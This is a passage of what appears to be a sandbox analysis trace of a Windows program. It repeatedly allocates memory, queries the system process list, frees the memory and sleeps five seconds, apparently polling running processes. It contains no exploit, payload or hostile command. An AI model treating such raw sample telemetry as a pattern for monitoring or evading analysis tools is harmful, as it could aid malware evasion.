BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0161.340] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0161.344] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0161.345] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0161.349] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0161.349] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0161.350] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0161.351] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0161.351] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0161.356] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0161.357] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0161.361] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0161.362] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0161.363] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0161.363] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0161.363] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0161.391] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0161.392] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0161.399] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0161.399] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0161.400] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0161.401] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0161.401] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0161.405] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0161.406] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0161.416] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0161.416] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0161.417] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0161.417] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0161.418] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0161.422] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0161.422] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0161.425] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0161.426] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0161.426] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0161.427] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0161.427] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0161.432] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0161.433] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0161.442] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0161.443] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0161.444] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0161.446] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0161.447] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0161.497] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0161.499] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0161.505] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0161.505] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0161.509] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0161.509] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0161.510] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0161.515] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0161.516] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0161.525] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0161.526] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0161.527] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0161.527] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0161.528] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0161.534] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0161.535] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0161.539] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0161.539] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0161.541] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0161.541] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0161.541] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0161.546] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0161.546] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0161.548] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0161.549] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0161.550] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0161.550] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0161.551] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0161.555] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0161.556] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0161.589] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0161.589] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0161.590] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0161.591] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0161.591] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0161.599] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0161.600] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0161.602] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0161.602] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0161.603] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0161.603] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0161.603] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0161.609] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0161.610] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0161.616] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0161.617] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0161.618] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0161.618] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0161.618] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0161.623] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0161.624] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0161.626] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0161.626] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0161.627] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0161.627] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0161.628] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0161.632] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0161.633] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0161.637] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0161.638] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0161.639] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0161.639] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0161.640] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0161.654] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0161.655] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0161.659] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0161.660] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0161.661] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0161.661] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0161.661] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0161.666] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0161.666] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0161.669] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0161.669] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0161.670] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0161.671] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0161.671] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0161.676] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0161.676] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0161.679] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0161.704] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0161.707] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0161.707] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0161.708] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0161.712] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0161.713] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0161.716] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0161.717] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0161.718] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0161.718] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0161.718] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0161.723] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0161.724] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0161.727] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0161.727] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0161.728] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0161.730] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0161.730] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0161.735] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0161.736] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0161.753] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0161.753] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0161.755] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0161.755] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0161.772] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, 